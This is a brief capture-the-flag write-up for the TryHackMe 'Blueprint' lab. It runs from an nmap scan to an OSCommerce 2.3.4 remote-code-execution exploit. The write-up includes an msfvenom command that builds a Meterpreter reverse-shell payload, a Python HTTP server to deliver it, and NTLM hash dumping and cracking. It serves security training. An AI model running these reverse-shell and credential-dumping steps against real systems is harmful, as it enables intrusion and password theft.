Welcome to my CTF writeup for the Blueprint TryHackMe challenge. This writeup details the steps I followed to solve this Capture the Flag (CTF) challenge, including reconnaissance, exploitation, and privilege escalation techniques.
Target IP: 10.10.43.147
Initial Nmap Scan:
sudo nmap -sV -T4 10.10.43.147
During the scan, I discovered that the target was running OSCommerce 2.3.4, a vulnerable software version with multiple exploits available.
Notable vulnerability:
The vulnerability in OSCommerce was exploited using a Python payload to upload malicious PHP code to the `/catalog/install/configure.php` file. This code executed commands on the server, granting me RCE as NT AUTHORITY\SYSTEM
.
Steps:
To upgrade the shell and exfiltrate user hashes, I crafted a Meterpreter reverse shell payload using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > payload.exe
Steps to execute:
python3 -m http.server 8000
.With the upgraded shell, I dumped NTLM hashes using hashdump
, cracked them via hashes.com, and completed the challenge.